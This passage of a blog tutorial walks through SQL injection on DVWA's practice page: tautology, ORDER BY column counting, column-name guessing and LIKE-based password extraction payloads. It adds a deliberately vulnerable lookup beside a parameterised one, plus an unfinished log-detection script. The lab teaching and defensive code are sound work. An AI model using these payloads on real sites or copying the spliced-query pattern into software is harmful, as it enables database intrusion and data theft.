<li style="border-bottom-width: 0px; border-color: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; color: white; font-family: Arial; font-size: 13px; line-height: 18px; margin-bottom: 0px; margin-left: 25px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;"><span style="font-family: Consolas, serif;">Note how we used </span><span style="color: red;"><span style="font-family: Consolas, serif;">''=' </span></span><span style="font-family: Consolas, serif;">at the end of our injection. This takes care of the application's final single quote by turning it into a comparison that is always true: </span><span style="color: red;"><span style="font-family: Consolas, serif;">''='</span></span><span style="color: #0070c0;"><span style="font-family: Consolas, serif;">'</span></span></li>
</ul></li>
<li style="border-bottom-width: 0px; border-color: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; color: white; font-family: Arial; font-size: 13px; line-height: 18px; margin-bottom: 0px; margin-left: 25px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;"><span style="color: #0070c0;"><span style="font-family: Consolas, serif;">SELECT first_name, last_name FROM users WHERE user_id = '</span></span><span style="color: red;"><span style="font-family: Consolas, serif;"><em><strong>a' OR 'x'='x';#</strong></em></span></span><span style="color: #0070c0;"><span style="font-family: Consolas, serif;">'"</span></span><ul style="border-bottom-width: 0px; border-color: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; margin-bottom: 15px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;"><li style="border-bottom-width: 0px; border-color: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; color: white; font-family: Arial; font-size: 13px; line-height: 18px; margin-bottom: 0px; margin-left: 25px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;"><span style="font-family: Consolas, serif;">Here is an alternative injection string that also works. An injection suffix of </span><span style="color: red;"><span style="font-family: Consolas, serif;">;#</span></span><span style="font-family: Consolas, serif;"> comments out the SQL that follows it (# starts a line comment in MySQL), so what remains of the statement is syntactically valid. We will use this suffix for most of the following injection strings.</span></li>
</ul></li>
</ul><div style="border-bottom-width: 0px; border-color: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; color: white; font-family: Arial; font-size: 13px; line-height: 18px; margin-bottom: 15px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;"><a href="http://www.blogger.com/post-edit.g?blogID=456962442660639401&postID=4916077203322048635" name="Find the number of returned columns"></a><span style="font-family: Consolas, serif;"><strong>Find the number of returned columns:</strong></span></div><ul style="border-bottom-width: 0px; border-color: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; margin-bottom: 15px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;"><li style="border-bottom-width: 0px; border-color: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; color: white; font-family: Arial; font-size: 13px; line-height: 18px; margin-bottom: 0px; margin-left: 25px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;"><span style="color: #0070c0;"><span style="font-family: Consolas, serif;">SELECT first_name, last_name FROM users WHERE user_id = '</span></span><span style="color: red;"><span style="font-family: Consolas, serif;"><em><strong>a' ORDER BY 1;#</strong></em></span></span><span style="color: #0070c0;"><span style="font-family: Consolas, serif;"><em><strong>'</strong></em></span></span><span style="color: #0070c0;"><span style="font-family: Consolas, serif;">"</span></span><ul style="border-bottom-width: 0px; border-color: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; margin-bottom: 15px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;"><li style="border-bottom-width: 0px; border-color: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; color: white; font-family: Arial; font-size: 13px; line-height: 18px; margin-bottom: 0px; margin-left: 25px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;"><span style="font-family: Consolas, serif;"><strong>Result:</strong></span><span style="font-family: Consolas, serif;"> Nothing... this means that the original SELECT statement returns at least one column.</span></li>
</ul></li>
<li style="border-bottom-width: 0px; border-color: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; color: white; font-family: Arial; font-size: 13px; line-height: 18px; margin-bottom: 0px; margin-left: 25px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;"><span style="color: #0070c0;"><span style="font-family: Consolas, serif;">SELECT first_name, last_name FROM users WHERE user_id = '</span></span><span style="color: red;"><span style="font-family: Consolas, serif;"><em><strong>a' ORDER BY 2;#</strong></em></span></span><span style="color: #0070c0;"><span style="font-family: Consolas, serif;"><em><strong>'</strong></em></span></span><span style="color: #0070c0;"><span style="font-family: Consolas, serif;">"</span></span><ul style="border-bottom-width: 0px; border-color: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; margin-bottom: 15px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;"><li style="border-bottom-width: 0px; border-color: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; color: white; font-family: Arial; font-size: 13px; line-height: 18px; margin-bottom: 0px; margin-left: 25px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;"><span style="font-family: Consolas, serif;"><strong>Result:</strong></span><span style="font-family: Consolas, serif;"> Nothing... this means that the original SELECT statement returns at least two columns.</span></li>
</ul></li>
<li style="border-bottom-width: 0px; border-color: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; color: white; font-family: Arial; font-size: 13px; line-height: 18px; margin-bottom: 0px; margin-left: 25px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;"><span style="color: #0070c0;"><span style="font-family: Consolas, serif;">SELECT first_name, last_name FROM users WHERE user_id = '</span></span><span style="color: red;"><span style="font-family: Consolas, serif;"><em><strong>a' ORDER BY 3;#</strong></em></span></span><span style="color: #0070c0;"><span style="font-family: Consolas, serif;"><em><strong>'</strong></em></span></span><span style="color: #0070c0;"><span style="font-family: Consolas, serif;">"</span></span><ul style="border-bottom-width: 0px; border-color: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; margin-bottom: 15px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;"><li style="border-bottom-width: 0px; border-color: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; color: white; font-family: Arial; font-size: 13px; line-height: 18px; margin-bottom: 0px; margin-left: 25px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;"><span style="font-family: Consolas, serif;"><strong>Result:</strong></span><span style="font-family: Consolas, serif;"> Unknown column '3' in 'order clause'</span><ul style="border-bottom-width: 0px; border-color: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; margin-bottom: 15px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;"><li style="border-bottom-width: 0px; border-color: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; color: white; font-family: Arial; font-size: 13px; line-height: 18px; margin-bottom: 0px; margin-left: 25px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;"><span style="font-family: Consolas, serif;">This means that the original SELECT statement returns only two columns (in this case first_name and last_name; we don't usually get to see the text in blue, and these injection phrases let us learn the structure of the original SQL query). If we use UNION to return other results, the number of columns in our injected UNION phrase must equal the number of columns in the original SQL query.</span></li>
</ul></li>
</ul></li>
</ul><div style="border-bottom-width: 0px; border-color: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; color: white; font-family: Arial; font-size: 13px; line-height: 18px; margin-bottom: 15px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;"><a href="http://www.blogger.com/post-edit.g?blogID=456962442660639401&postID=4916077203322048635" name="Find field names - First Try"></a><span style="font-family: Consolas, serif;"><strong>Find field names – First Try:</strong></span></div><ul style="border-bottom-width: 0px; border-color: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; margin-bottom: 15px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;"><li style="border-bottom-width: 0px; border-color: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; color: white; font-family: Arial; font-size: 13px; line-height: 18px; margin-bottom: 0px; margin-left: 25px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;"><span style="color: #0070c0;"><span style="font-family: Consolas, serif;">SELECT first_name, last_name FROM users WHERE user_id = '</span></span><span style="color: red;"><span style="font-family: Consolas, serif;"><em><strong>a' OR firstname IS NULL;#</strong></em></span></span><span style="color: #0070c0;"><span style="font-family: Consolas, serif;">'"</span></span><ul style="border-bottom-width: 0px; border-color: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; margin-bottom: 15px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;"><li style="border-bottom-width: 0px; border-color: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; color: white; font-family: Arial; font-size: 13px; line-height: 18px; margin-bottom: 0px; margin-left: 25px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;"><span style="font-family: Consolas, serif;"><strong>Result:</strong></span><span style="font-family: Consolas, serif;"> Unknown column 'firstname' in 'where clause'</span></li>
<li style="border-bottom-width: 0px; border-color: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; color: white; font-family: Arial; font-size: 13px; line-height: 18px; margin-bottom: 0px; margin-left: 25px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;"><span style="font-family: Consolas, serif;"><strong>This is good...</strong></span><span style="font-family: Consolas, serif;"> we now know that there is no column named firstname. Let's take a few more guesses.</span></li>
</ul></li>
</ul><ul style="border-bottom-width: 0px; border-color: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; margin-bottom: 15px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;"><li style="border-bottom-width: 0px; border-color: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; color: white; font-family: Arial; font-size: 13px; line-height: 18px; margin-bottom: 0px; margin-left: 25px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;"><span style="color: #0070c0;"><span style="font-family: Consolas, serif;">SELECT first_name, last_name FROM users WHERE user_id = </span></span><span style="color: #0070c0;"><span style="font-family: Consolas, serif;"><em><strong>'</strong></em></span></span><span style="color: red;"><span style="font-family: Consolas, serif;"><em><strong>a' OR firstname = ''='</strong></em></span></span><span style="color: #0070c0;"><span style="font-family: Consolas, serif;">'"</span></span><ul style="border-bottom-width: 0px; border-color: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; margin-bottom: 15px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;"><li style="border-bottom-width: 0px; border-color: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; color: white; font-family: Arial; font-size: 13px; line-height: 18px; margin-bottom: 0px; margin-left: 25px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;"><span style="font-family: Consolas, serif;">This is an alternate way to do it. It should also work: there should still be an error if the column does not exist.</span></li>
</ul></li>
</ul><div style="border-bottom-width: 0px; border-color: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; color: white; font-family: Arial; font-size: 13px; line-height: 18px; margin-bottom: 15px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;"><a href="http://www.blogger.com/post-edit.g?blogID=456962442660639401&postID=4916077203322048635" name="Find field names - Second Try"></a><span style="font-family: Consolas, serif;"><strong>Find field names – Second Try:</strong></span></div><ul style="border-bottom-width: 0px; border-color: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; margin-bottom: 15px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;"><li style="border-bottom-width: 0px; border-color: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; color: white; font-family: Arial; font-size: 13px; line-height: 18px; margin-bottom: 0px; margin-left: 25px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;"><span style="color: #0070c0;"><span style="font-family: Consolas, serif;">SELECT first_name, last_name FROM users WHERE user_id = </span></span><span style="color: #0070c0;"><span style="font-family: Consolas, serif;"><em><strong>'</strong></em></span></span><span style="color: red;"><span style="font-family: Consolas, serif;"><em><strong>a' OR first_name IS NULL;#</strong></em></span></span><span style="color: #0070c0;"><span style="font-family: Consolas, serif;">'"</span></span><ul style="border-bottom-width: 0px; border-color: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; margin-bottom: 15px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;"><li style="border-bottom-width: 0px; border-color: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; color: white; font-family: Arial; font-size: 13px; line-height: 18px; margin-bottom: 0px; margin-left: 25px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;"><span style="font-family: Consolas, serif;"><strong>Result:</strong> Nothing</span></li>
<li style="border-bottom-width: 0px; border-color: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; color: white; font-family: Arial; font-size: 13px; line-height: 18px; margin-bottom: 0px; margin-left: 25px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;"><span style="font-family: Consolas, serif;">This is good. No error means there is a column named first_name. Nothing is returned because first_name is not NULL, i.e. it has something in it.</span></li>
</ul></li>
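<li style="border-bottom-width: 0px; border-color: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; color: white; font-family: Arial; font-size: 13px; line-height: 18px; margin-bottom: 0px; margin-left: 25px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;">
<span style="font-family: Consolas, serif;">Every probe so far relies on three properties of the DVWA page: the id is pasted straight into the SQL string (which is why the display-all-rows loop and the ;# suffix matter), and the raw MySQL error text is shown to the user (which is what the column-name guesses read). The following is an added example, not DVWA's own code: it builds the five sample users shown above in an in-memory sqlite3 table (sqlite stands in for MySQL so it runs offline; MySQL's # comment is not a comment in sqlite, so only the comment-free probe forms from this page are exercised) and places the DVWA-style lookup next to a hardened one that binds the id as a parameter, reads a single row, and logs database errors server-side while the caller gets a fixed message. The names below are the example's own.</span>

```python
"""Vulnerable vs. hardened user lookup over DVWA-style sample data.

Added example, not DVWA's own code.  sqlite3 stands in for MySQL so it runs
offline; MySQL's '#' line comment is not a comment in sqlite, so only the
comment-free probe forms from this page are exercised here.
"""
import logging
import sqlite3

log = logging.getLogger("user_lookup")

GENERIC_ERROR = "Lookup failed"   # what the client sees; detail goes to the log

# Constructed sample data mirroring the five rows DVWA displays above.
SAMPLE_USERS = [
    (1, "admin", "admin"),
    (2, "Gordon", "Brown"),
    (3, "Hack", "Me"),
    (4, "Pablo", "Picasso"),
    (5, "bob", "smith"),
]


def make_db():
    """Build an in-memory users table with the first_name/last_name columns."""
    conn = sqlite3.connect(":memory:")
    conn.execute(
        "CREATE TABLE users (user_id INTEGER PRIMARY KEY, "
        "first_name TEXT NOT NULL, last_name TEXT NOT NULL)"
    )
    conn.executemany("INSERT INTO users VALUES (?, ?, ?)", SAMPLE_USERS)
    return conn


def lookup_vulnerable(conn, user_id):
    """The DVWA 'low' pattern: the id is spliced into the SQL text, every
    matching row is returned for display, and the raw database error is
    handed back to the caller.  Returns ('rows', [...]) or ('error', text)."""
    sql = ("SELECT first_name, last_name FROM users "
           "WHERE user_id = '" + user_id + "'")
    try:
        return "rows", conn.execute(sql).fetchall()
    except sqlite3.Error as exc:
        return "error", str(exc)      # leaks column/table names to the client


def lookup_hardened(conn, user_id):
    """Bound parameter: the id can only ever be a value, never SQL syntax.
    A primary-key lookup has at most one answer, so only one row is read,
    and database errors are logged here while the caller gets a fixed
    message.  Returns ('rows', [row]), ('rows', []) or ('error', GENERIC)."""
    sql = "SELECT first_name, last_name FROM users WHERE user_id = ?"
    try:
        row = conn.execute(sql, (user_id,)).fetchone()
        return "rows", ([row] if row else [])
    except sqlite3.Error as exc:
        log.warning("user lookup failed for %r: %s", user_id, exc)
        return "error", GENERIC_ERROR


if __name__ == "__main__":
    db = make_db()
    for probe in ("1", "a' OR ''='", "a' OR firstname = ''='"):
        print(f"{probe!r:28} vulnerable -> {lookup_vulnerable(db, probe)}")
        print(f"{'':28} hardened   -> {lookup_hardened(db, probe)}")
    db.close()
    print("hardened on a closed connection ->", lookup_hardened(db, "1"))
```

<span style="font-family: Consolas, serif;">Run it directly to see both versions answer the same three inputs: the vulnerable lookup returns all five users for the first probe and echoes "no such column: firstname" for the second, while the hardened one returns no rows for either because the whole string is compared against user_id as a value. The final call, on a closed connection, shows the generic message the hardened lookup gives back when the database itself fails; the detail lands in the server log, not in the page.</span>
</li>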
</ul><ul style="border-bottom-width: 0px; border-color: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; margin-bottom: 15px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;"><li style="border-bottom-width: 0px; border-color: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; color: white; font-family: Arial; font-size: 13px; line-height: 18px; margin-bottom: 0px; margin-left: 25px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;"><span style="color: #0070c0;"><span style="font-family: Consolas, serif;">SELECT first_name, last_name FROM users WHERE user_id = '</span></span><span style="color: red;"><span style="font-family: Consolas, serif;"><em><strong>a' OR first_name = ''='</strong></em></span></span><span style="color: #0070c0;"><span style="font-family: Consolas, serif;">'"</span></span><ul style="border-bottom-width: 0px; border-color: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; margin-bottom: 15px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;"><li style="border-bottom-width: 0px; border-color: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; color: white; font-family: Arial; font-size: 13px; line-height: 18px; margin-bottom: 0px; margin-left: 25px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;"><span style="font-family: Consolas, serif;">The alternate form will not error out if the column name is correct, but unlike the IS NULL probe above it should print the expected results for the first row (because of the loop noted above, it will actually display all rows).</span></li>
<li style="border-bottom-width: 0px; border-color: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; color: white; font-family: Arial; font-size: 13px; line-height: 18px; margin-bottom: 0px; margin-left: 25px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;"><span style="font-family: Consolas, serif;">Try a few other fields….not all of these will work, but give them a try and see what happens:</span><ul style="border-bottom-width: 0px; border-color: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; margin-bottom: 15px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;"><li style="border-bottom-width: 0px; border-color: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; color: white; font-family: Arial; font-size: 13px; line-height: 18px; margin-bottom: 0px; margin-left: 25px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;"><span style="font-family: Consolas, serif;">user_id</span></li>
<li style="border-bottom-width: 0px; border-color: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; color: white; font-family: Arial; font-size: 13px; line-height: 18px; margin-bottom: 0px; margin-left: 25px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;"><span style="font-family: Consolas, serif;">lastname</span></li>
<li style="border-bottom-width: 0px; border-color: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; color: white; font-family: Arial; font-size: 13px; line-height: 18px; margin-bottom: 0px; margin-left: 25px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;"><span style="font-family: Consolas, serif;">last_name</span></li>
<li style="border-bottom-width: 0px; border-color: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; color: white; font-family: Arial; font-size: 13px; line-height: 18px; margin-bottom: 0px; margin-left: 25px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;"><span style="font-family: Consolas, serif;">image</span></li>
<li style="border-bottom-width: 0px; border-color: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; color: white; font-family: Arial; font-size: 13px; line-height: 18px; margin-bottom: 0px; margin-left: 25px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;"><span style="font-family: Consolas, serif;">links</span></li>
<li style="border-bottom-width: 0px; border-color: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; color: white; font-family: Arial; font-size: 13px; line-height: 18px; margin-bottom: 0px; margin-left: 25px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;"><span style="font-family: Consolas, serif;">link</span></li>
<li style="border-bottom-width: 0px; border-color: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; color: white; font-family: Arial; font-size: 13px; line-height: 18px; margin-bottom: 0px; margin-left: 25px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;"><span style="font-family: Consolas, serif;">avatar</span></li>
<li style="border-bottom-width: 0px; border-color: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; color: white; font-family: Arial; font-size: 13px; line-height: 18px; margin-bottom: 0px; margin-left: 25px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;"><span style="font-family: Consolas, serif;">pass</span></li>
<li style="border-bottom-width: 0px; border-color: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; color: white; font-family: Arial; font-size: 13px; line-height: 18px; margin-bottom: 0px; margin-left: 25px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;"><span style="font-family: Consolas, serif;">password</span></li>
<li style="border-bottom-width: 0px; border-color: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; color: white; font-family: Arial; font-size: 13px; line-height: 18px; margin-bottom: 0px; margin-left: 25px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;"><span style="font-family: Consolas, serif;">user</span></li>
</ul></li>
</ul></li>
</ul><div style="border-bottom-width: 0px; border-color: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; color: white; font-family: Arial; font-size: 13px; line-height: 18px; margin-bottom: 15px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;"><a href="http://www.blogger.com/post-edit.g?blogID=456962442660639401&postID=4916077203322048635" name="Finding user names - LIKE"></a><span style="font-family: Consolas, serif;"><strong>Finding user names – LIKE:</strong></span></div><div style="border-bottom-width: 0px; border-color: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; color: white; font-family: Arial; font-size: 13px; line-height: 18px; margin-bottom: 15px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;"><span style="font-family: Consolas, serif;">Let's say that the page is a bit more secure and only lists one result at a time. If we need to know a username (and we can't just insert a sequential number), how do we get more names? With LIKE, of course. (Here we assume that first_name is what we are trying to find.)</span></div><ul style="border-bottom-width: 0px; border-color: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; margin-bottom: 15px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;"><li style="border-bottom-width: 0px; border-color: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; color: white; font-family: Arial; font-size: 13px; line-height: 18px; margin-bottom: 0px; margin-left: 25px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;"><span style="color: #0070c0;"><span style="font-family: Consolas, serif;">SELECT first_name, last_name FROM users WHERE user_id = </span></span><span style="color: #0070c0;"><span style="font-family: Consolas, serif;"><em><strong>'</strong></em></span></span><span style="color: red;"><span style="font-family: Consolas, serif;"><em><strong>a' OR first_name LIKE '%P%';#</strong></em></span></span><span style="color: #0070c0;"><span style="font-family: Consolas, serif;">'"</span></span></li>
</ul><div style="border-bottom-width: 0px; border-color: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; color: white; font-family: Arial; font-size: 13px; line-height: 18px; margin-bottom: 15px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;"><span style="font-family: Consolas, serif;">Using the same technique, it may be possible to find the values of other fields (passwords, email addresses, etc.).</span></div><ul style="border-bottom-width: 0px; border-color: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; margin-bottom: 15px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;"><li style="border-bottom-width: 0px; border-color: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; color: white; font-family: Arial; font-size: 13px; line-height: 18px; margin-bottom: 0px; margin-left: 25px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;"><span style="color: #0070c0;"><span style="font-family: Consolas, serif;">SELECT first_name, last_name FROM users WHERE user_id = </span></span><span style="color: #0070c0;"><span style="font-family: Consolas, serif;"><em><strong>'</strong></em></span></span><span style="color: red;"><span style="font-family: Consolas, serif;"><em><strong>a' OR first_name='Pablo' AND password LIKE '%a%';#</strong></em></span></span><span style="color: #0070c0;"><span style="font-family: Consolas, serif;">'"</span></span></li>
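<li style="border-bottom-width: 0px; border-color: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; color: white; font-family: Arial; font-size: 13px; line-height: 18px; margin-bottom: 0px; margin-left: 25px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;">
<span style="font-family: Consolas, serif;">Seen from the server side, the walkthrough above is a short burst of requests from one client whose id parameter takes a handful of recognisable shapes: a quote followed by OR, an ORDER BY with a number, IS NULL, LIKE with a wildcard, and the ;# suffix. The following is an added example, not DVWA's own code, that pulls those shapes out of web-server access logs: the log lines are constructed in the Apache/nginx combined format against DVWA's /vulnerabilities/sqli/ path, the query string is URL-decoded before matching, and the pattern names and functions are the example's own.</span>

```python
"""Spot the SQL-injection probe shapes from this page in web access logs.

Added example, not DVWA's own code.  The log lines are constructed in the
Apache/nginx "combined" format against DVWA's /vulnerabilities/sqli/ page;
query parameters are URL-decoded before matching, so a%27+OR+%27%27%3D%27
is inspected as "a' OR ''='".
"""
import re
from collections import Counter
from urllib.parse import parse_qs, urlsplit

# Constructed sample log: one normal lookup, four probes discussed above, and
# a legitimate value containing an apostrophe that must not be flagged.
SAMPLE_LOG = r"""
10.0.0.5 - - [28/Nov/2010:18:00:01 -0800] "GET /vulnerabilities/sqli/?id=1&Submit=Submit HTTP/1.1" 200 1534 "-" "Mozilla/5.0"
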